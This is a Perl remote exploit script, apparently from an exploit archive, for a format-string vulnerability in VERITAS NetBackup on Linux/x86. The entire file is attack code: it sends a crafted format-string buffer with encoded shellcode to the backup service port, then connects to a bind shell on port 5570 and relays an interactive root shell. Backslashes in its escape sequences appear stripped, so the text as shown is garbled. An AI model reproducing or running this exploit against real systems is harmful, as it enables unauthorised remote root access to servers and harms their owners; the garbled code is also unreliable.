#!/usr/bin/perl
##############################################################
# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
##############################################################

use POSIX;
use IO::Socket;
use IO::Select;
use strict;

print STDERR "nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploitn";

if ($#ARGV == -1) {
        print "Usage:nt$0 <hostname> <port>nn";
        exit (1);
}

my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;

buildexploit ($hostName, $port);

my $shellport = 5570;
print "[*] Connect to remote shell portn";
my $sock = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $hostName,
                PeerPort => $shellport,
                Type => SOCK_STREAM
);

if (! $sock)
{
        print "[*] Error, Seems Failedn";
        exit (0);
}

print "[*] G0t R00Tn";

StartShell ($sock);

sub buildexploit
{
		my ($host, $port) = @_;
		my $s = IO::Socket::INET->new (
                	Proto => "tcp",
                	PeerAddr => $host,
               	 	PeerPort => $port,
                	Type => SOCK_STREAM
		);
				
		if (! $s)
		{
		        print "[*] Could not create socket: $!n";
				        exit(0);
		}
				
		print $s " 118      1nOWNED BABYn";
		print scalar <$s>;
		print scalar <$s>;

		my $shellcode = "x90" x 500 .
		"xd9xeexd9x74x24xf4x5bx31xc9xb1x16x81x73x17x13x99".
		"x37xe2x83xebxfcxe2xf4x22x42xc0x01xa3xffx64xa1x40".
		"xdax64x6bxf2xd2xfax62x9ax5ex65x84x7bx8cxf5xa1x75".
		"xcaxbex03xa3x89x67xb3x44x10xd6x52x75x54xb7x52x75".
		"x2ax33x2fx93xc9x67xb5x9ax78x74x52x75x54xb7x6bxca".
		"x10xf4x52x2cxd0xfax62x52x7bxcfxb3x7bxf7x18x91x7b".
		"xf1x18xcdx71xf0xbex01x42xcaxbex03xa3x92xfax62";
		my $retloc = 0x080b50ec; #0x080b53b4;
		my $retaddr = 0x80e0658; # can't use shellcode in stack.
		my $hi = ($retaddr >> 0) & 0xffff;
		my $lo = ($retaddr >> 16) & 0xffff;
				
				
		$hi = $hi - 0x28;
		$lo = (0x10000 + $lo + 0x28) - $hi - 0x50;		
				
		my $align = 3;
		my $buffer = " 101      6n" . "a" x $align . pack ('l', $retloc) .  pack ('l', $retloc + 2) .
		"%." . $hi . "lx" . "%1694$hn" .
		"%." . $lo . "lx" . "%1695$hn" .
		$shellcode . "n" .
		$shellcode . "n" .
		"in" . "0wnedn" . "y0un".
		"boot.inin" . "n";
				
		print STDERR "Sending " .length($buffer) . " bytes to remoten";		
		sleep (10);				
		print $s $buffer;
		print scalar <$s>;		
				
		close $s;
}

sub StartShell 
{
        my ($client) = @_;	
	my $sel = IO::Select->new();
				
					
	# unbuffered fun.
				
				
	Unblock(*STDIN);			
	Unblock(*STDOUT);
	Unblock($client);
				
	select($client); $|++;
	select(STDIN);   $|++;
	select(STDOUT);  $|++;
				
	$sel->add($client);
	$sel->add(*STDIN);
				
	while (fileno($client))
	{		
		my $fd;
		my @fds = $sel->can_read(1);
				
		foreach $fd (@fds)
		{
			my $in = <$fd>;
			if (! $in || ! $fd || ! $client)
			{
				print "[*] Closing connection.n";
				close($client);
				exit(0);            
			}
				
			if ($fd eq $client)
		        {
				print STDOUT $in;
				} else {
					print $client $in;
				}
			}
		}
		close ($client);
		exit (0);
}

sub Unblock {
        my $fd = shift;
        my $flags;
        $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!n";
        fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!n";
}

# www.Syue.com [2005-10-20]